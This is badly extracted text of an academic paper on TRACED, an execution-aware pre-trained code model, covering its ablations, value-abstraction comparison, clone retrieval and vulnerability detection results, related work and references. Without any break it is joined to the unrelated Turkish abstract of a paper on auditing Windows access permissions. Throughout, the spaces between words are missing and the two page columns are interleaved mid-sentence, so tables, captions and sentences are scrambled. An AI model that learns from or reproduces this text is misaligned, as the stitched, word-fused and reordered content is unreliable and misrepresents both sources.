-w/oMLM 70.4 82.6 85.3 86.0 85.6 49.0 89.2 UnixCoderPrediction(Wrong) -w/oPSP 69.0 81.4 83.0 86.9 84.9 44.0 87.4 n:Zero -w/oVCP 66.1 80.3 82.4 85.6 84.0 46.7 89.0 TRACEDPrediction(Correct) -MLM-only 65.6 81.0 83.1 86.0 84.6 43.0 87.5 n:NegativeLarge Result. The comparison is shown in Table 3, Row-1 vs. Row-2. Figure6:Thequalitativeexampleofruntimevalueprediction.The TRACEDsignificantlyoutperformsUnixCoderinthestaticesti- samplecontainsavulnerabilityoftypeCWE-457“UseofUninitial- mation of execution coverage and dynamic values of variables, izedVariable".Theuninitializedn,whichisrandomlyassignedas especiallywhentheevaluationgranularityiscoarse,i.e.,fullexe- -32767,isusedinthefor-loop.TRACEDsuccessfullyexposesthis cutionpath(FullPathcolumninTable3)andtheruntimevalues abnormalbehaviorstaticallybyidentifying𝑛asa“NegativeLarge" ofthefullexecution(FullExeccolumninTable3).TRACEDcor- valuewhileUnixCoderfails.Predictionsofothervariablesarehid- rectlypredictsthecompleteexecutionpathsfor71.6%held-out denforbetterillustration. samplesandaccuratelypredictsallvariablevaluesfor49.2%exe- Result-1: Withasimilarnumberoflearnableparameters, cutions,revealingtheexecution-awarepre-trainingimprovesover TRACED outperforms the state-of-the-art pre-trained code UnixCoder’sperformanceby12.4%and25.2%,respectively. CaseStudywithQualitativeExamples.Wepresenttwoqualita- model in the static estimation of program execution task. Ourproposedpre-trainingsuccessfullyencodestheexecution tiveexamplesinFigure5and6toconcretelycompareTRACEDwith awarenessintoTRACED’scoderepresentations. UnixCoderinexecutioncoverageandruntimevaluepredictions, respectively.Bothsampleshavesimpleexecutionlogicfromthe humanperspective,butthestaticallypre-trainedUnixCoderstill 6.2 RQ2.Effectivenessof TRACED’s failstocorrectlyestimatethem.Figure5illustratesthatUnixCoder Pre-trainingObjectives isnotsensitivetodistinctinputsthattriggerdifferentexecution coverage,whileTRACEDisabletodeterminethenumericalrela- Oneofthemaincontributionsofthispaperisproposingmulti-task tionsamongvariedvalues.Figure6illustratesTRACED’scapacity pre-trainingtoeffectivelylearntheexecution-awarecoderepre- inexposingabnormalprogrambehaviors. sentations.InthisRQ,westudytheeffectivenessandcontributionTRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal ofeachof TRACED’sobjectives,andconsequentlyillustratethe importanceofthemultipletasks. Toconducttheseexperiments,weremoveonepre-trainingob- jectiveatatimeandpre-trainthevariantwithexactlythesame setupasthemainmodel.Thenwefine-tunethevariantonthe staticexecutionestimationtaskandcomparetheperformancewith themainmodel.Wealsoconsideravariantthatispre-trainedon ourdatasetbutonlywithMLMobjectives.Theresultsareshown inRow3-6ofTable3.RemovinganyobjectivehurtsTRACED’s performance,suggestingthatcomprehensivelylearningbothstatic anddynamiccodepropertiesismoreeffectivethanlearningone perspectivealone. Result-2: TRACED’smulti-taskpre-traininghelpsthemodel comprehensively learn both static and dynamic aspects of source code. Removing any one of TRACED’s three pre- Figure7:ComparingTRACED’sdesignofquantizedvariablevalues withothervalueabstractionstrategies. trainingobjectivesnoticeablyhurtsthemodel’sperformance instaticallyestimatingprogramexecutions. Interestingly,wenoticebothofLExecutor’sabstractionsperform slightlyworsethanTRACED.WespeculatethatLExecutorisnot assensitiveasTRACEDtonumericrelationsintheconditional 6.3 RQ3.Effectivenessof TRACED’sQuantized statements,astheydonotdistinguishamongsmall,regular,and VariableValues largevalues.Notethatexecutioncoverageisnotthemainfocus ofLExecutor,somorefine-grainedcategoriesarenotrequiredto Anothercontributionofthispaperisthatthesimplifiedandcom- serveitsgoal,whiletheyareempiricallyproventobenecessary pactrepresentationofprogramexecutionshelpscodemodelsto forTRACED’sscope. capturedynamiccodeproperties.InthisRQ,weempiricallyreveal thatthedesignofquantizedvariablevaluesespeciallycontributes totheeffectivelearningofthecodemodels,asitreducesthedata Result-3: TRACED’squantizedvariablevaluesdirectlycon- sparsityofvariablevaluesbutstilldefinessufficientlydetailedvalue tributetotheeffectivenessofitsexecution-awarepre-training. categoriestodistinguishdissimilarvalues. It reduces the data sparsity of concrete values but defines Toisolatetheevaluationof TRACED’squantizedvalues,we sufficientlydetailedvaluecategoriestodistinguishdissimilar pre-trainseveralvariantsbyonlyrecreatingquantizedvaluelabels, valuesforreasoningaboutexecutionpaths. i.e.,𝑞 𝑣𝑎𝑟 inEquation2,usingdifferentvalueabstractionstrategies. For example, when we pre-train a variant studying the impact 6.4 RQ4.TRACED’sPerformanceinCode ofconcretevalues,wereplaceTRACED’sdefined𝑞 𝑣𝑎𝑟 withthe UnderstandingTasks
concretetracedvalues.Asdifferentstrategiesabstractvaluesat differentgranularities,itisnotfeasibletocomparethemforthe InthisRQ,westudyTRACED’sperformanceontwocodeunder- valuepredictiontask,sincethecoarse-grainedstrategywillbenefit. standingtasks:semanticcloneretrievalandfunction-levelvulner- Therefore,weonlyfine-tunethestudiedvariantsfortheexecution abilitydetection.Notethatsamplesforthesetasksarenotpaired coverageprediction. withexecutableinputs,sothemodelneedstoreasonaboutthe Baseline.First,weconsidercomparingwithconcretevalues,asit generalcodesemanticstomakepredictions. isthemostintuitivestrategytorepresentvariablevalues.Then,we Baselines.Weconsiderfivepre-trainedcodemodelswithsimilar considertwodataabstractionsfromLExecutor[45]:coarseandfine- parametersizestoTRACED.CodeBERT[16]pre-trainsaRoBERTa grained.Theysharesimilarhigh-levelintuitionwithus,mapping modelwithMLMandreplacedtokendetection(RTD)tasks.Graph- concretevaluestopre-definedbinstoreducedatacomplexityand CodeBERT[18]isinitializedwithCodeBERTandcontinuespre- consequentlyhelpthemodel’slearning.NotethatLExecutor’sdata trainingwithaugmenteddataflowgraphstolearnthestaticdata abstractionservesadifferentgoalthanTRACED,andfocuseson dependencies.PLBART[1]andCodeT5[49]bothapplytheseq2seq PythonwhileTRACEDfocusesonC,sowecouldnotdirectlyreuse neuralarchitecture,wherePLBARTadaptstheBART[29]modelto theirpre-definedbins.Astheirdefinitionofdataabstractionisclear learncodetranslationandsummarization,andCodeT5adapts[42] andstraightforward,were-implementtheirdataabstractionfor topredictthemissingcodetokensandlocatetheidentifiers.We theClanguageandintegrateitintoourframeworkforcomparison. also,again,considerUnixCoderasabaseline. WediscussandcompareLExecutorwithTRACEDinmoredetail Results.WeshowtheresultsinTable4.Eventhoughthesamples intheRelatedWorksection(§7). inthesebenchmarksdonothaveexecutableinputs,TRACEDstill Results.ThecomparisonofvalueabstractionsareshowninFig- outperformsthestaticallypre-trainedmodelsbyaclearmargin. ure7.Unsurprisingly,concretevaluesreportpoorperformance WespeculatethereasonisthatTRACEDcouldestimatethegen- comparedtootherdataabstractions,empiricallyrevealingthediffi- eralexecutionbehaviorswithoutspecificinputs,andtheprogram cultiesforcodemodelstofitsparseandcomplexdatadistributions. semanticsregardingthesetwocodeunderstandingtaskscouldbeICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay Table4:ComparisonofCloneRetrievalandbugdetection. executionatthesourcecodelevelbyimitatingthedevelopers’code practice.Variablesinsourcecodehavemorecomplicateddataand Task CloneRetrieval VulnerabilityDetection valuetypesthanmachineregisters.Weintroducequantizedvalues Dataset POJ-104 RV D2A CXG inordertodecreasethedatacomplexityandsparsity. Metric MAP@R F1 Acc Acc Severalworks[3,4,36,44,51]haveattemptedlearningtoexecute CodeBERT 82.7 47.3 59.2 63.4 programsasadirectgoal.SouzaandPradel[45]alsoproposedLEx- GraphCodeBERT 86.7 46.6 61.0 62.9 ecutortopredictmissingvaluesduringexecution.Whileitshares PLBART-base 75.9 46.9 61.7 63.3 similarintuitionofmappingconcretevaluestodiscretecategories, CodeT5-base* 65.9 46.5 62.1 64.4 LExecutorisdistinctfromTRACEDinseveralperspectives.First, UnixCoder 89.5 47.4 61.2 65.3 LExecutorfocusesonlyonpredictingthevalues,whileTRACED TRACED 91.2 50.4 62.1 65.9 proposes a general pre-training strategy to encode the compre- *CodeT5-basehas223Mparameters,roughlytwiceaslargeasother hensiveexecutionawareness,notonlyvaluesbutalsoexecution baselinesandTRACED.WereportitsperformanceasCodeT5-smallhas coverage,intothecoderepresentation.Besides,toyieldcoderepre- only60Mparametersandperformspoorly,andCodeT5doesnotprovidea sentationsatabetterquality,TRACEDjointlylearnsbothcodetext ∼110Mmodel. anddynamicexecutionsratherthanstickingtoasingleperspective. bettercapturedwithsuchageneralsense.Specifically,clonere- Duetothedistinctaimsanddesigns,weempiricallyillustratein trievalrequiresthemodeltoidentifythebehavioralsimilarities RQ3(§6.3)thatLExecutor’svalueabstractionsarenotperfectly ofcodeassemanticclonesmostlydifferincodetextandsyntax. alignedwithourscope. Also,vulnerablecodewithpotentialanomaliescouldbedirectly Nieetal.[34]annotatedprogramswithinformationaboutthe identifiedbyTRACEDinsomecaseslikeFigure6. program’spossibleexecutionswithoutexecutingthecodebutpro- vided only statically available information. Conversely, several Result-4: TRACEDoutperformsstaticallypre-trainedmodels works[19,37,46,47]requiredynamictracesasinput.Weshowthat incloneretrievalandvulnerabilitydetectiontasks,suggesting TRACED’spre-trainingisabletoencodetheexecutionawareness TRACED’sgeneralestimationofexecutionhelpsitcapturethe intocoderepresentationandestimatethedynamicsemanticswith codesemanticsmoreeffectively. staticinformationalone. 8 THREATSTOVALIDITY 7 RELATEDWORK
InternalValidity. First,thecurrentdesignofquantizedvalueis Pre-trainedModelsforSourceCode. Theresearchcommunity notcoveringallvariableswithintheprogramduetothecomplexity has shown a growing interest in developing pre-trained Trans- oftheirdatastructures,valueranges,and/ormemoryallocations. formermodelsforsourcecode.Thesemodelscanbebroadlycat- Second,currently,weonlytracetheprogrambyfeedingitvalid egorizedintothreeprimaryarchitectures:Encoder-only[5,6,10, andexecutableinputswhichwillnotterminatetheprogramor 16,18,24,48],Decoder-only[2,13,50],andEncoder-decoder[1, throwerrors.Thismightmakethemodellesscapableofcapturing 7,15,17,35].Encoder-onlymodelspredominantlyemployMLM programterminationanderror-throwingbehaviors. objectiveandsequenceunderstandingtasks(e.g.,predictingnext statement[24]andcontrastingsemantics[10]).Thisarchitectureex- ExternalValidity. Atpresent,TRACEDsupportsonlytheCpro- celsatunderstandingthestaticcodefeatures.Decoder-onlymodels, gramminglanguage.Thislimitationisduetotherelianceonthe ontheotherhand,aretypicallytrainedbypredictingcodetokens capabilitiesofthetracerusedtologtheexecutionhistory,which inaleft-to-rightmanner.Thisarchitecturefocusesongenerating maynotbereadilyavailableorequallyeffectiveforotherprogram- codetextbasedonlearnedpatterns.TheEncoder-decodermod- minglanguages.InordertoextendTRACED’sapplicability,itis elscombinethestrengthsofbothEncoder-onlyandDecoder-only necessarytoensurethatthetraceremployedcanaccuratelyand modelsandarepre-trainedusingvarioustasks,includingdenoising consistentlycapturetherequiredinformationacrossdifferentlan- autoencodingforreconstructingwronglypermutedtokens[1],pre- guages.AdaptingTRACEDtomultiplelanguageswouldrequire dictingmissingidentifiersinthecode[49],andrecoveringmethod thedevelopmentoradaptationoftracersthatcaneffectivelyhandle namesfromthesourcecode[35]. theintricaciesofeachlanguageandproducecomparableresults, Thesemodelsprimarilyfocusonlearningthestaticaspectsof enablingaconsistentanalysisofcodebehavioracrossabroader sourcecodebutoftenmissoutoncapturingthedynamicproper- rangeofprogramminglanguages. tiesofcodeexecution.Thislimitationrestrictsthesemodelsfrom accuratelyinferringruntimebehaviors,debuggingissues,andun- 9 CONCLUSION derstandingcomplexprogramstates. Inthispaper,weproposeTRACED,anexecution-awarepre-trained ModelingProgramExecution. Peietal.[38–40]proposedase- modelthatjointlylearnsthestaticanddynamiccodeproperties,to riesofpioneeringworkstolearntheexecutionsofbinaryprograms addressthelimitationofexisting,staticallypre-trainedcodemodels. withTransformer-basedmodels.Theyusedconcretevaluesfrom TheevaluationempiricallyrevealsthatTRACEDismoreeffective registers,whicharefeasibleintheirscopebecausebinaryprograms inestimatingcodeexecutionstaticallythanstaticallypre-trained haveasmallerspaceofpossiblevaluesandeffectscomparedto models.TRACEDalsosuccessfullytransfersexecutionawareness sourcecode.Ontheotherhand,ourworkfocusesonencoding tocodeunderstandingtasks.TRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal REFERENCES [19] JordanHenkel,ShuvenduK.Lahiri,BenLiblit,andThomasReps.2018. Code [1] WasiAhmad,SaikatChakraborty,BaishakhiRay,andKai-WeiChang.2021.Uni- vectors:understandingprogramsthroughembeddedabstractedsymbolictraces. fiedPre-trainingforProgramUnderstandingandGeneration.InProceedingsof InProceedingsofthe201826thACMJointMeetingonEuropeanSoftwareEngi- the2021ConferenceoftheNorthAmericanChapteroftheAssociationforComputa- neeringConferenceandSymposiumontheFoundationsofSoftwareEngineering tionalLinguistics:HumanLanguageTechnologies.AssociationforComputational (ESEC/FSE2018).AssociationforComputingMachinery,NewYork,NY,USA, Linguistics,Online,2655–2668. https://www.aclweb.org/anthology/2021.naacl- 163–174. https://doi.org/10.1145/3236024.3236085 main.211 [20] AbramHindle,EarlT.Barr,ZhendongSu,MarkGabel,andPremkumarDevanbu. [2] Jacob Austin, Augustus Odena, Maxwell Nye, Maarten Bosma, Henryk 2012. OntheNaturalnessofSoftware.InProceedingsofthe34thInternational Michalewski,DavidDohan,EllenJiang,CarrieJ.Cai,MichaelTerry,QuocV.Le, ConferenceonSoftwareEngineering(Zurich,Switzerland)(ICSE’12).IEEEPress, andCharlesSutton.2021.ProgramSynthesiswithLargeLanguageModels.CoRR 837–847. abs/2108.07732(2021).arXiv:2108.07732 https://arxiv.org/abs/2108.07732 [21] NanJiang,KevinLiu,ThibaudLutellier,andLinTan.2023. ImpactofCode [3] DavidBieber,RishabGoel,DanZheng,HugoLarochelle,andDanielTarlow. LanguageModelsonAutomatedProgramRepair. arXiv:2302.05020[cs.SE] 2022.StaticPredictionofRuntimeErrorsbyLearningtoExecuteProgramswith [22] NanJiang,ThibaudLutellier,YilingLou,LinTan,DanGoldwasser,andXiangyu
ExternalResourceDescriptions. https://openreview.net/forum?id=SIcz2sObJ-5 Zhang.2023.KNOD:DomainKnowledgeDistilledTreeDecoderforAutomated [4] David Bieber, Charles Sutton, Hugo Larochelle, and Daniel Tarlow. 2020. ProgramRepair. arXiv:2302.01857[cs.SE] LearningtoExecuteProgramswithInstructionPointerAttentionGraphNeu- [23] NanJiang,ThibaudLutellier,andLinTan.2021. CURE:Code-AwareNeural ralNetworks.InAdvancesinNeuralInformationProcessingSystems,Vol.33. MachineTranslationforAutomaticProgramRepair.In2021IEEE/ACM43rd CurranAssociates,Inc.,8626–8637. https://papers.nips.cc/paper/2020/hash/ InternationalConferenceonSoftwareEngineering(ICSE).1161–1173. https://doi. 62326dc7c4f7b849d6f013ba46489d6c-Abstract.html org/10.1109/ICSE43902.2021.00107 [5] NghiD.Q.Bui,YijunYu,andLingxiaoJiang.2021.Self-SupervisedContrastive [24] AdityaKanade,PetrosManiatis,GogulBalakrishnan,andKensenShi.2020. LearningforCodeRetrievalandSummarizationviaSemantic-PreservingTrans- Learningandevaluatingcontextualembeddingofsourcecode.InICML2020. formations.InSIGIR’21(VirtualEvent,Canada).511–521. https://doi.org/10. [25] Rafael-MichaelKarampatsis,HlibBabii,RomainRobbes,CharlesSutton,and 1145/3404835.3462840 AndreaJanes.2020. BigCode!=BigVocabulary:Open-VocabularyModels [6] LucaBuratti,SaurabhPujar,MihaelaBornea,ScottMcCarley,YunhuiZheng, forSourceCode.In2020IEEE/ACM42ndInternationalConferenceonSoftware GaetanoRossiello,AlessandroMorari,JimLaredo,VeronikaThost,YufanZhuang, Engineering(ICSE).1073–1085. andGiacomoDomeniconi.2020.ExploringSoftwareNaturalnessthroughNeural [26] SeulbaeKim,SeunghoonWoo,HeejoLee,andHakjooOh.2017. VUDDY:A LanguageModels. arXiv:2006.12641[cs.CL] ScalableApproachforVulnerableCodeCloneDiscovery.In2017IEEESymposium [7] SaikatChakraborty,ToufiqueAhmed,YangruiboDing,PremkumarDevanbu, onSecurityandPrivacy(SP).595–614. https://doi.org/10.1109/SP.2017.62 andBaishakhiRay.2022. NatGen:Generativepre-trainingby"Naturalizing" [27] DiederikP.KingmaandJimmyBa.2015.Adam:AMethodforStochasticOpti- sourcecode.In2022TheACMJointEuropeanSoftwareEngineeringConference mization.CoRRabs/1412.6980(2015). andSymposiumontheFoundationsofSoftwareEngineering(ESEC/FSE).ACM. [28] TakuKudoandJohnRichardson.2018.SentencePiece:Asimpleandlanguage [8] SaikatChakraborty,RahulKrishna,YangruiboDing,andBaishakhiRay.2021. independentsubwordtokenizeranddetokenizerforNeuralTextProcessing.In DeepLearningbasedVulnerabilityDetection:AreWeThereYet. IEEETrans- Proceedingsofthe2018ConferenceonEmpiricalMethodsinNaturalLanguage actionsonSoftwareEngineering(2021),1–1. https://doi.org/10.1109/TSE.2021. Processing:SystemDemonstrations.AssociationforComputationalLinguistics, 3087402 Brussels,Belgium,66–71. https://doi.org/10.18653/v1/D18-2012 [9] JacobDevlin,Ming-WeiChang,KentonLee,andKristinaToutanova.2019.BERT: [29] MikeLewis,YinhanLiu,NamanGoyal,MarjanGhazvininejad,Abdelrahman Pre-trainingofDeepBidirectionalTransformersforLanguageUnderstanding. Mohamed,OmerLevy,VeselinStoyanov,andLukeZettlemoyer.2020. BART: InProceedingsofthe2019ConferenceoftheNorthAmericanChapteroftheAsso- DenoisingSequence-to-SequencePre-trainingforNaturalLanguageGeneration, ciationforComputationalLinguistics:HumanLanguageTechnologies,Volume1. Translation,andComprehension.InProceedingsofthe58thAnnualMeetingof AssociationforComputationalLinguistics,Minneapolis,Minnesota,4171–4186. theAssociationforComputationalLinguistics.AssociationforComputational https://doi.org/10.18653/v1/N19-1423 Linguistics,Online,7871–7880. https://doi.org/10.18653/v1/2020.acl-main.703 [10] YangruiboDing,LucaBuratti,SaurabhPujar,AlessandroMorari,BaishakhiRay, [30] ZhenLi,DeqingZou,ShouhuaiXu,HaiJin,HanchaoQi,andJieHu.2016. andSaikatChakraborty.2022. TowardsLearning(Dis)-SimilarityofSource VulPecker:AnAutomatedVulnerabilityDetectionSystemBasedonCodeSim- CodefromProgramContrasts.InProceedingsofthe60thAnnualMeetingofthe ilarityAnalysis.InProceedingsofthe32ndAnnualConferenceonComputer AssociationforComputationalLinguistics(Volume1:LongPapers).Association Security Applications (Los Angeles, California, USA) (ACSAC ’16). 201–213. forComputationalLinguistics,Dublin,Ireland,6300–6312. https://doi.org/10. https://doi.org/10.1145/2991079.2991102 18653/v1/2022.acl-long.436 [31] YinhanLiu,MyleOtt,NamanGoyal,JingfeiDu,MandarJoshi,DanqiChen,Omer [11] YangruiboDing,BaishakhiRay,DevanbuPremkumar,andVincentJ.Hellendoorn. Levy,MikeLewis,LukeZettlemoyer,andVeselinStoyanov.2019.RoBERTa:A 2020.PatchingasTranslation:theDataandtheMetaphor.In35thIEEE/ACMInter- RobustlyOptimizedBERTPretrainingApproach.CoRRabs/1907.11692(2019). nationalConferenceonAutomatedSoftwareEngineering(VirtualEvent,Australia) arXiv:1907.11692 http://arxiv.org/abs/1907.11692
(ASE’20). https://doi.org/10.1145/3324884.3416587 [32] ShuaiLu,DayaGuo,ShuoRen,JunjieHuang,AlexeySvyatkovskiy,Ambrosio [12] AdamPaszkeetal..2019.PyTorch:AnImperativeStyle,High-PerformanceDeep Blanco,ColinB.Clement,DawnDrain,DaxinJiang,DuyuTang,GeLi,Lidong LearningLibrary. Zhou,LinjunShou,LongZhou,MicheleTufano,MingGong,MingZhou,Nan [13] MarkChenetal..2021. EvaluatingLargeLanguageModelsTrainedonCode. Duan,NeelSundaresan,ShaoKunDeng,ShengyuFu,andShujieLiu.2021. CoRRabs/2107.03374(2021).arXiv:2107.03374 https://arxiv.org/abs/2107.03374 CodeXGLUE:AMachineLearningBenchmarkDatasetforCodeUnderstanding [14] ThomasWolfetal..2020. Transformers:State-of-the-ArtNaturalLanguage andGeneration.CoRRabs/2102.04664(2021). Processing.InProceedingsofthe2020ConferenceonEmpiricalMethodsinNatural [33] LiliMou,GeLi,LuZhang,TaoWang,andZhiJin.2016.Convolutionalneuralnet- LanguageProcessing:SystemDemonstrations.AssociationforComputational worksovertreestructuresforprogramminglanguageprocessing.InProceedings Linguistics,Online,38–45. https://doi.org/10.18653/v1/2020.emnlp-demos.6 oftheThirtiethAAAIConferenceonArtificialIntelligence.1287–1293. [15] YujiaLietal..2022.Competition-LevelCodeGenerationwithAlphaCode.ArXiv [34] PengyuNie,RahulBanerjee,JunyiJessyLi,RaymondJ.Mooney,andMilos abs/2203.07814(2022). Gligoric.2023. LearningDeepSemanticsforTestCompletion.arXiv. https: [16] ZhangyinFeng,DayaGuo,DuyuTang,NanDuan,XiaochengFeng,MingGong, //doi.org/10.48550/arXiv.2302.10166arXiv:2302.10166[cs]. LinjunShou,BingQin,TingLiu,DaxinJiang,andMingZhou.2020.CodeBERT: [35] ChanganNiu,ChuanyiLi,VincentNg,JidongGe,LiguoHuang,andBinLuo. APre-TrainedModelforProgrammingandNaturalLanguages.InFindingsofthe 2022.SPT-Code:Sequence-to-SequencePre-TrainingforLearningSourceCode AssociationforComputationalLinguistics:EMNLP2020.AssociationforComputa- Representations. CoRRabs/2201.01549(2022). arXiv:2201.01549 https://arxiv. tionalLinguistics,Online,1536–1547. https://doi.org/10.18653/v1/2020.findings- org/abs/2201.01549 emnlp.139 [36] MaxwellNye,AndersJohanAndreassen,GuyGur-Ari,HenrykMichalewski, [17] DayaGuo,ShuaiLu,NanDuan,YanlinWang,MingZhou,andJianYin.2022. JacobAustin,DavidBieber,DavidDohan,AitorLewkowycz,MaartenBosma, UniXcoder:UnifiedCross-ModalPre-trainingforCodeRepresentation. https: DavidLuan,CharlesSutton,andAugustusOdena.2021. ShowYourWork: //doi.org/10.48550/ARXIV.2203.03850 ScratchpadsforIntermediateComputationwithLanguageModels. https: [18] DayaGuo,ShuoRen,ShuaiLu,ZhangyinFeng,DuyuTang,ShujieLIU,Long //doi.org/10.48550/arXiv.2112.00114 Zhou,NanDuan,AlexeySvyatkovskiy,ShengyuFu,MicheleTufano,ShaoKun [37] JibeshPatraandMichaelPradel.2022.Nalin:learningfromruntimebehaviorto Deng,ColinClement,DawnDrain,NeelSundaresan,JianYin,DaxinJiang, findname-valueinconsistenciesinjupyternotebooks.InProceedingsofthe44th andMingZhou.2021. GraphCode{BERT}:Pre-trainingCodeRepresentations InternationalConferenceonSoftwareEngineering.ACM,PittsburghPennsylvania, withDataFlow.InInternationalConferenceonLearningRepresentations. https: 1469–1481. https://doi.org/10.1145/3510003.3510144 //openreview.net/forum?id=jLoC4ez43PZ [38] KexinPei,JonasGuan,MatthewBroughton,ZhongtianChen,SongchenYao, DavidWilliams-King,VikasUmmadisetty,JunfengYang,BaishakhiRay,and SumanJana.2021.StateFormer:fine-grainedtyperecoveryfrombinariesusingICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay generativestatemodeling.InProceedingsofthe29thACMJointMeetingon [46] KeWang,RishabhSingh,andZhendongSu.2018. DynamicNeuralProgram EuropeanSoftwareEngineeringConferenceandSymposiumontheFoundationsof EmbeddingsforProgramRepair. https://openreview.net/forum?id=BJuWrGW0Z SoftwareEngineering(ESEC/FSE2021).AssociationforComputingMachinery, [47] KeWangandZhendongSu.2020.Blended,precisesemanticprogramembeddings. NewYork,NY,USA,690–702. https://doi.org/10.1145/3468264.3468607 InProceedingsofthe41stACMSIGPLANConferenceonProgrammingLanguage [39] KexinPei,DongdongShe,MichaelWang,ScottGeng,ZhouXuan,YanivDavid, DesignandImplementation(PLDI2020).AssociationforComputingMachinery, JunfengYang,SumanJana,andBaishakhiRay.2022. NeuDep:neuralbinary NewYork,NY,USA,121–134. https://doi.org/10.1145/3385412.3385999 memorydependenceanalysis.InProceedingsofthe30thACMJointEuropean [48] XinWang,YashengWang,FeiMi,PingyiZhou,YaoWan,XiaoLiu,LiLi,Hao SoftwareEngineeringConferenceandSymposiumontheFoundationsofSoftware Wu,JinLiu,andXinJiang.2021. SynCoBERT:Syntax-GuidedMulti-Modal
Engineering(ESEC/FSE2022).AssociationforComputingMachinery,NewYork, ContrastivePre-TrainingforCodeRepresentation. https://doi.org/10.48550/ NY,USA,747–759. https://doi.org/10.1145/3540250.3549147 ARXIV.2108.04556 [40] KexinPei,ZhouXuan,JunfengYang,SumanJana,andBaishakhiRay.2020.Trex: [49] YueWang,WeishiWang,ShafiqJoty,andStevenC.H.Hoi.2021. CodeT5: LearningExecutionSemanticsfromMicro-TracesforBinarySimilarity.CoRR Identifier-awareUnifiedPre-trainedEncoder-DecoderModelsforCodeUnder- abs/2012.08680(2020).arXiv:2012.08680 https://arxiv.org/abs/2012.08680 standingandGeneration.InProceedingsofthe2021ConferenceonEmpirical [41] RuchirPuri,DavidS.Kung,GeertJanssen,WeiZhang,GiacomoDomeniconi, MethodsinNaturalLanguageProcessing,EMNLP2021. VladimirZolotov,JulianDolby,JieChen,MihirR.Choudhury,LindseyDecker, [50] FrankFXu,UriAlon,GrahamNeubig,andVincentJHellendoorn.2022.ASystem- VeronikaThost,LucaBuratti,SaurabhPujar,andUlrichFinkler.2021.Project aticEvaluationofLargeLanguageModelsofCode.arXivpreprintarXiv:2202.13169 CodeNet:ALarge-ScaleAIforCodeDatasetforLearningaDiversityofCoding (2022). Tasks.CoRRabs/2105.12655(2021).arXiv:2105.12655 https://arxiv.org/abs/2105. [51] WojciechZarembaandIlyaSutskever.2015. LearningtoExecute. https: 12655 //doi.org/10.48550/arXiv.1410.4615 [42] ColinRaffel,NoamShazeer,AdamRoberts,KatherineLee,SharanNarang, [52] AndreasZeller.2005. WhyProgramsFail:AGuidetoSystematicDebugging. MichaelMatena,YanqiZhou,WeiLi,andPeterJ.Liu.2020.ExploringtheLimits MorganKaufmannPublishersInc.,SanFrancisco,CA,USA. ofTransferLearningwithaUnifiedText-to-TextTransformer.JournalofMachine [53] YunhuiZheng,SaurabhPujar,BurnLewis,LucaBuratti,EdwardEpstein,Bo LearningResearch21,140(2020),1–67. http://jmlr.org/papers/v21/20-074.html Yang,JimLaredo,AlessandroMorari,andZhongSu.2021. D2A:ADataset [43] BaishakhiRay,VincentHellendoorn,SaheelGodhane,ZhaopengTu,Alberto BuiltforAI-BasedVulnerabilityDetectionMethodsUsingDifferentialAnalysis. Bacchelli,andPremkumarDevanbu.2016.Onthe"Naturalness"ofBuggyCode. In2021IEEE/ACM43rdInternationalConferenceonSoftwareEngineering:Soft- InProceedingsofthe38thInternationalConferenceonSoftwareEngineering(Austin, wareEngineeringinPractice(ICSE-SEIP).111–120. https://doi.org/10.1109/ICSE- Texas)(ICSE’16).AssociationforComputingMachinery,NewYork,NY,USA, SEIP52600.2021.00020 428–439. https://doi.org/10.1145/2884781.2884848 [54] YaqinZhou,ShangqingLiu,JingkaiSiow,XiaoningDu,andYangLiu.2019. [44] ScottReedandNandodeFreitas.2016.NeuralProgrammer-Interpreters. https: Devign:Effectivevulnerabilityidentificationbylearningcomprehensiveprogram //doi.org/10.48550/arXiv.1511.06279arXiv:1511.06279[cs]. semanticsviagraphneuralnetworks.InAdvancesinNeuralInformationProcessing [45] BeatrizSouzaandMichaelPradel.2023.LExecutor:Learning-GuidedExecution. Systems.10197–10207. https://doi.org/10.48550/arXiv.2302.02343arXiv:2302.02343[cs].
2306.07734 OKU Fen Bilimleri Enstitüsü Dergisi OKU Journal of The Institute of Science and 5(2): 534-550, 2022 Technology, 5(2): 534-550, 2022 Osmaniye Korkut Ata Üniversitesi Osmaniye Korkut Ata University Fen Bilimleri Enstitüsü Journal of The Institute of Science Dergisi and Technology Erişim İzni Güvenlik Açığı Tespitinde Windows'un Kaynak Tabanlı İzin Mekanizmasının Tersine Bir Yaklaşım Hakan TEMİZ1*, Ahmet BÜYÜKEKE2 1Kontrol ve Otomasyon Teknolojisi, Borçka Acarlar Meslek Yüksekokulu, Artvin Çoruh Üniversitesi, Artvin, 08000 2Yönetim Bilişim Sistemleri, İşletme Fakültesi, Adana Alparslan Türkeş Bilim ve Teknoloji Üniversitesi, Adana, 01250 1https://orcid.org/0000-0002-1351-7565 2https://orcid.org/0000-0002-6103-7646 *Sorumlu yazar: htemiz@artvin.edu.tr Araştırma Makalesi ÖZ Makale Tarihçesi: Kurum çalışanları görev ve sorumluluklarına göre dosyalarda saklanan Geliş tarihi: 08.12.2021 bilgilerle çalışırlar. Windows (İşletim sistemi), herhangi bir kullanıcı için Kabul tarihi:10.01.2022 herhangi bir iznin kaynak başına ayrı olarak ayarlanması gereken kaynak Online Yayınlanma: 18.07. 2022 tabanlı erişim izinlerini kullanır. Bu yöntemde, kaynak ve kullanıcı sayısı arttıkça durum daha karmaşık bir hal alır ve izinlerin atanmasında gözden Anahtar Kelimeler: kaçmalara neden olur. Bu nedenle, herhangi bir çalışanın herhangi bir Aktif dizin kullanıcıları kaynak kümesi üzerinde hangi izinlere sahip olduğunu incelemek için özel Windows sunucu Erişim izinleri bir mekanizma gereklidir. Bu gereksinim, Windows'un kaynaklara kullanıcı Güvenlik açığı tarafından erişilebilen yaklaşımını tersine çevirerek aşılabilmektedir. Bu Denetleme yaklaşım, herhangi bir klasörde aktif dizin kullanıcılarına verilen veya Raporlama reddedilen her türlü iznin hızlı ve kolay bir şekilde incelenmesini ve raporlanmasını sağlayan bir program ile gerçekleştirilmiştir. Araştırmalarımıza göre, yukarıda belirtilen görevleri Windows'un yerleşik araçlarından farklı bir şekilde gerçekleştiren böyle bir araç ilk kez geliştirilmektedir. Önerilen yöntem, yöneticilerin bir güvenlik açığına neden olabilecek eksik veya gözden kaçan bir yetkilendirmenin olmadığından emin olmalarını sağlar. 